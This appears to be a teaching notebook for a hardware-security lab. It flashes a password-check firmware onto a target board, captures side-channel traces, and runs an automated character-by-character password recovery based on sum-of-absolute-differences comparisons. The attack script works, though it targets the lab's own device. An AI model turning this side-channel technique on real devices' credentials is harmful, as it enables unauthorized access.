# Lecture 2: Password Attack with Timing Analysis - Attack

In [ ]:
import securec
from securec import util
scope, target = util.init()

In [ ]:
securec.util.compile_and_flash('./1_password_fixed.c')

In [ ]:
import struct
import time
import warnings
    
scope.default_setup()
scope.adc.samples = 1000

def capture(attempt):
    scope.arm()
    target.simpleserial_write('p', attempt.encode() + b'\x00' * (10 - len(attempt)))
    result = target.simpleserial_read('p', 1)
    return util.capture(), bool(result[0])

## The sum of absolute differences
In this example we want to see how a technique called SAD (sum of absolute differences) is useful to auto-detect whether a character was correct or not.
Given two traces $t_1, t_2$ their SAD value is defined as:
$$\text{SAD}(t_1, t_2) := \sum_i \big| t_1[i] - t_2[i] \big|,$$
where $t[i]$ is the value of trace $t$ at point $i$.

In [ ]:
def sad(trace1, trace2):
    return sum(abs(trace1 - trace2))

## Visualize SAD

In [ ]:
from bokeh.plotting import figure, show 
from bokeh.io import output_notebook
from bokeh.models import CrosshairTool
from bokeh.palettes import Category10_10

output_notebook()

In [ ]:
traces = [(attempt, capture(attempt)[0]) for attempt in ('', 'a', 'i')]

In [ ]:
p = figure(width=900, height=200)
p.add_tools(CrosshairTool())
for idx, ((attempt1, trace1), (attempt2, trace2)) in enumerate([
    (traces[0], traces[1]),
    (traces[0], traces[2]),
]):
    p.line(
        range(len(trace1)), 
        abs(trace1 - trace2), 
        line_color=Category10_10[idx],
        legend_label=f'abs("{attempt1}" - "{attempt2}") with SAD = {sad(trace1, trace2):.2f}'
    )
show(p)

## Automated attack

In [ ]:
def attack_password_sad(
    sad_threshold=20,
    charlist='abcdefghijklmnopqrstuvwxyz0123456789'
):
    result = False
    password = ''

    while not result or len(password) > 9:
        basetrace, _ = capture(password)
        for c in charlist:
            trace, result = capture(password + c)
            if sad(trace, basetrace) > sad_threshold:
                password += c
                print(f'success: "{c}" => password = {password}')
                break
        else:
            print('no found')
            break
    return password, result

In [ ]:
attack_password_sad()

In [ ]:
util.exit()